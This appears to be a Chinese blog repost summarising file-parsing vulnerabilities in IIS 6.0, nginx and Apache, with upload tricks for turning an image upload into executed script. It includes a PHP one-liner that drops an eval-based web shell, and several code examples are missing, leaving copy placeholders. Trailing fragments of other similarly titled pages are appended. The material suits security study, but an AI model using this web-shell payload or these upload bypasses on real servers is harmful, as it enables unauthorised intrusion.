解析漏洞總結

2021-09-11 11:25:01 字數 1831 閱讀 8857

erevus · 2013/09/02 11:25

iis 6.0解析利用方法有兩種

1.目錄解析

複製**2.檔案解析

複製**第一種,在**下建立資料夾的名字為 .asp、.asa 的資料夾,其目錄內的任何副檔名的檔案都被iis當作asp檔案來解析並執行。

例如建立目錄 wooyun.asp,那麼

複製**將被當作asp檔案來執行。假設黑闊可以控制上傳資料夾路徑,就可以不管你上傳後你的改不改名都能拿shell了。

第二種,在iis6.0下,分號後面的不被解析,也就是說

複製**會被伺服器看成是wooyun.asp

還有iis6.0 預設的可執行檔案除了asp還包含這三種

/wooyun.asa

/wooyun.cer

/wooyun.cdx

複製**

烏雲上的iis 6.0解析漏洞利用案例

www.wooyun.org/searchbug.p…

nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發現的…

在預設fast-cgi開啟狀況下,黑闊上傳乙個名字為wooyun.jpg,內容為

<?php fputs(fopen('shell.php','w'),'<?php eval($_post[cmd])?>');?>

複製**

的檔案,然後訪問wooyun.jpg/.php,在這個目錄下就會生成一句話木馬 shell.php

這個漏洞案例

wooyun: 用友軟體某分站sql注入漏洞+nginx解析漏洞

wooyun: kingsoft.com某x級網域名稱nginx解析漏洞+爆路徑

影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

nginx在中嵌入php**然後通過訪問

複製**來執行其中的**

nginx 空位元組代執行漏洞案例

www.wooyun.org/searchbug.p…

apache 是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷.

比如 wooyun.php.owf.rar 「.owf」和」.rar」 這兩種字尾是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php.

如何判斷是不是合法的字尾就是這個漏洞的利用關鍵,測試時可以嘗試上傳乙個wooyun.php.rara.jpg.png…(把你知道的常見字尾都寫上…)去測試是否是合法字尾

apache解析漏洞案例

www.wooyun.org/searchbug.p…

在windows環境下,xx.jpg[空格] 或xx.jpg. 這兩類檔案都是不允許存在的,若這樣命名,windows會預設除去空格或點,黑客可以通過抓包,在檔名後加乙個空格或者點繞過黑名單.若上傳成功,空格和點都會被windows自動消除,這樣也可以getshell。

如果在apache中.htaccess可被執行.且可被上傳.那可以嘗試在.htaccess中寫入:

複製**

然後再上傳shell.jpg的木馬, 這樣shell.jpg就可解析為php檔案。

解析漏洞總結

iis 6.0 解析利用方法有兩種 1.目錄解析 檔案解析 第一種,在 下建立資料夾的名字為 asp asa 的資料夾,其目錄內的任何副檔名的檔案都被 iis當作 asp檔案來解析並執行。例如建立目錄 wooyun.asp 那麼 wooyun.asp 1.jpg 將被當作 asp檔案來執行。假設黑闊...

解析漏洞總結

zone某處總結的很好 解析漏洞總結erevus 2013 09 02 11 25 其中nginx解析漏洞的原因是 在php 的 fastcgi 方式下,php獲取環境變數的方式不正確。舉例 對映url時,兩個環境變數很重要 path info 預設 1 script filename 訪問.com...

解析漏洞總結

怎麼看 搭建平台 seo查詢 工具查詢 掃瞄工具 wwwscan,wvs,破殼等 手工查詢 判斷大小寫,伺服器系統 index.asp index.asp 6.0 檔案形式和資料夾形式 檔案形式 x.asp x.asp x.jpg gif,txt,png等 asp執行 資料夾形式 xx xx.asp...